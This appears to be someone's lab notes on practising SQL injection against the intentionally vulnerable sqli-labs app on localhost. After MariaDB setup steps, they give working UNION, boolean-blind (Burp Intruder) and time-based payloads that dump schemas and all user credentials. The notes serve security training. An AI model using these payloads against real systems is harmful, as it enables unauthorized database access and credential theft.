root@kali-2017:~# service mysql start
root@kali-2017:~# mysql -u root -p
MariaDB [(none)]> use mysql;

GRANT ALL PRIVILEGES ON *.* TO 'alex'@'localhost' IDENTIFIED BY 'password';
root@kali-2017:~# service mysql restart

root@kali-2017:/var/www/html/sqli-labs-php7/sql-connections# cd 
update db-creds.inc
m
service mysql restart
root@kali-2017:/var/www/html/sqli-labs-php7/sql-connections# service apache2 start

root@kali-2017:/etc/mysql/mariadb.conf.d# vi 50-server.cnf 

uncomment:
general_log_file        = /var/log/mysql/mysql.log
general_log             = 1

root@kali-2017:/etc/mysql/mariadb.conf.d# service mysql restart

OWASP A1 Pt3:

True id=1 cannot display our disired output:
localhost/sqli-labs-php7/Less-1/?id=1' UNION SELECT 1,2,3--+

http://localhost/sqli-labs-php7/Less-1/?id=9999%27%20UNION%20SELECT%201,version(),database()--+

http://localhost/sqli-labs-php7/Less-1/?id=9999%27%20UNION%20SELECT%201,user(),@@datadir--+

Find out the schema table:
localhost/sqli-labs-php7/Less-1/?id=-1' UNION SELECT * FROM users WHERE id='-1' union SELECT 1,group_concat(DISTINCT table_schema SEPARATOR ', '),
3 FROM information_schema.tables WHERE table_schema!= 'mysql' AND table_schema != 'information_schema' --+

Find out the table details:
localhost/sqli-labs-php7/Less-1/?id=-1' UNION SELECT * FROM users WHERE id='-1' union SELECT 1,group_concat(DISTINCT column_name SEPARATOR ', '),
3 FROM information_schema.columns WHERE table_schema='security' --+

Show all username and password:
localhost/sqli-labs-php7/Less-1/?id=-1' union select 1,group_concat(username SEPARATOR ', '), group_concat(password SEPARATOR ', ') from users --+

OWASP A1 Pt4:
Less-8 Blind SQL-->Check Ture(You are in):
http://localhost/sqli-labs-php7/Less-8/?id=1' AND 1=1 --+

MariaDB [mysql]> use security;
MariaDB [security]> select substr(database(),1,1);
MariaDB [security]> select ascii(substr(database(),1,1));
Use Burp:
id=1' AND (ascii(substr((select database()),1,1))) = ascii --+
http://localhost/sqli-labs-php7/Less-8/?id=1%27%20AND%20(ascii(substr((select%20database()),1,1)))%20=%20ascii%20--+
Sent to GET to Intruder, clear §; payload on §ascii§, payload type:Numbers 97-121,Step 1, 
Then(115):
GET /sqli-labs-php7/Less-8/?id=1%27%20AND%20(ascii(substr((select%20database()),1,1)))%20=%20115%20--+

Less-9 Blind-Time based
MariaDB [security]> select if ((select ascii(substr((select database()),1,1))) = 115, sleep(5), null);

id=1' AND if((select ascii(substr((select database()),1,1))) = 115, sleep(5), null) --+
http://localhost/sqli-labs-php7/Less-9/?id=1%27%20AND%20if((select%20ascii(substr((select%20database()),1,1)))%20=%20115,%20sleep(5),%20null)%20--+
Like before:
localhost/sqli-labs-php7/Less-9/?id=1' AND if((select ascii(substr((select database()),1,1))) = ascii, sleep(5), null) --+

